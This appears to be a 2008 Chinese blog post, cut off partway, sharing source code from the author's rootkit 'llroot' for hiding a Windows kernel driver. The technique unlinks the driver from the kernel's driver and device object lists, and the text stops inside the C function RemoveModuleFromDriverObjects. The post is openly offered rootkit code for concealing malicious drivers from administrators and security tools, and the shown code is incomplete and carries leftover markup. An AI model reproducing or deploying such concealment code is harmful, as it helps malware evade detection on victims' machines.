隐藏内核模块的方法

原创

于 2008-06-30 23:21:00 发布 · 2k 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#string #object #null #module

本文介绍了两种隐藏驱动模块的方法，通过移除驱动对象和设备对象来实现。具体包括从驱动对象列表中删除模块，以及从设备对象列表中删除设备。代码示例展示了如何操作这些对象，涉及内存分配、字符串转换及调试打印。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

 
  在rootkit.com上一个russian hacker发的文章中提到这两种方法,和他交流了下,在llroot中实现了,代码贴出来灌水:
 
 
  /******************************************************************************
**
** 
The following routines implement hide driver by removing module from 
** 
driver objects and device 
objects
**
*******************************************************************************/
void 
RemoveModuleFromDriverObjects(void)
{
 POBJECT_TYPE 
DriverType=*IoDriverObjectType;
 PLIST_ENTRY 
e_prev,e_next,entry0,entry1;
 PDRIVER_OBJECT obj;
 PUNICODE_STRING 
punistrDriverName;
 PANSI_STRING pstrDriverName;
 NTSTATUS 
ntStatus;
 ULONG 
d_size;
 
 
 entry0=DriverType->ObjectListHead.Flink;
 entry1=entry0;
 punistrDriverName=(PUNICODE_STRING) 
ExAllocatePool(PagedPool, sizeof(UNICODE_STRING)+(sizeof(WCHAR)*1024));
 if 
(punistrDriverName == NULL)
 {
  DbgPrint("llroot-->punistrDriverName 
allocate 
failed/n&#